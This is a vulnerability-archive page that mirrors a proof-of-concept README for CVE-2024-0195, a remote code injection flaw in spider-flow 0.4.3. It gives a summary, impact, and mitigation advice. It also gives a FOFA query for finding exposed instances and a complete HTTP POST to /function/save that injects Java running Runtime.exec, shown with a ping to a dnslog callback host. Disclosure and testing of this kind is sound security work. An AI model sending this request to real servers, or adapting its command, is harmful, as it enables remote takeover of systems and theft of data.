Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-0195 PoC — spider-flow FunctionController.java FunctionService.saveFunction code injection

Source
https://github.com/fa-rrel/CVE-2024-0195-SpiderFlow
Associated Vulnerability
Title:spider-flow FunctionController.java FunctionService.saveFunction code injection (CVE-2024-0195)
Description:A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.
Description
CVE-2024-0195 Improper Control of Generation of Code ('Code Injection')
Readme
# CVE-2024-0195 Improper Control of Generation of Code ('Code Injection')

# Summary
CVE-2024-0195 is a critical code injection vulnerability in the spider-flow 0.4.3 web application, specifically in the FunctionService.saveFunction function of the FunctionController.java file. An attacker can remotely inject malicious code which gets executed on the server. This allows complete compromise of the application.

# Impact
This vulnerability is extremely severe as it allows remote code execution on the server hosting the vulnerable spider-flow application. An attacker could fully compromise the server, steal sensitive data, install malware or crypto miners, and use it for further attacks inside the network. The confidentiality, integrity and availability of the application and server are all critically impacted.

# Patch
A patched version is not explicitly mentioned, so patching currently does not seem to be an option. The vulnerability was publicly disclosed and exploits are available, so immediate mitigation is critical.

# Mitigation
Until an official patch is released, spider-flow 0.4.3 should be immediately taken offline or access restricted only to trusted networks/users. Web application firewalls or other input validation controls could potentially be configured to detect and block attempted code injection attacks as an interim mitigation. However, these are not full solutions and the vulnerable version should be upgraded as soon as a fixed release is available.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


# Exploitation
FOFA : app="spiderflow"

✔ Proof of concept 

```
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
```
File Snapshot

 [4.0K]  /data/pocs/ab5948716683a34a20482f664279595800e35d67
├── [2.1K]  CVE-2024-0195.yaml
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →